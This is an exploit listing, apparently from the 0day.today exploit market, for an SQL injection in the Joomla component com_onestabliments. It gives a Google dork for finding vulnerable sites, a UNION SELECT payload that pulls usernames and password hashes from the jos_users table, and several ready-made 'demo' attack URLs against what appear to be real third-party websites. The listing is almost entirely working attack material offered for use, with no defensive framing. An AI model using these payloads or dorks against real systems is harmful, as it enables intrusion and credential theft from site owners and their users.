[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_onestabliments SQL Injection Vulnerability

Author
_aL_bayraqim_
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13719
Category
web applications
Date add
17-08-2010
Platform
php
===============================================================
Joomla Component com_onestabliments SQL Injection Vulnerability 
===============================================================

Author : _aL_Bayraqim_

Homepage : http://www.1923turk.com

..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!...!..KaraBulut....!..!...Ramses....!....!...MЭ cahit...!

===================================================
[+]G00gle Dork :index.php?option=com_onestabliments

[+] Vulnerable File :


http://www.tourarta.com/web/index.php?option=com_onestabliments[SQL]


[+] ExploiT :

-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat_ws(username,0x3a,password),26,27,28,29+from+jos_users--?


[+] Example :

http://www.tourarta.com/web1/index.php?option=com_onestabliments&task=listTipo&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat_ws(username,0x3a,password),26,27,28,29+from+jos_users--?

/index.php?option=com_onestabliments&task=listTipo&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat_ws(username,0x3a,password),27,28,29+from+jos_users--


[+] Demo :
http://www.tourarta.com/web/index.php?option=com_onestabliments&task=listTipo&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat_ws(username,0x3a,password),27,28,29+from+jos_users--
[+]Demo:
http://www.infosoller.es/web/index.php?option=com_onestabliments&task=listTipo&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat_ws(username,0x3a,password),26,27,28,29+from+jos_users--
===================================================

Greetz : 1923Turk All Users



#  0day.today [2024-11-14]  #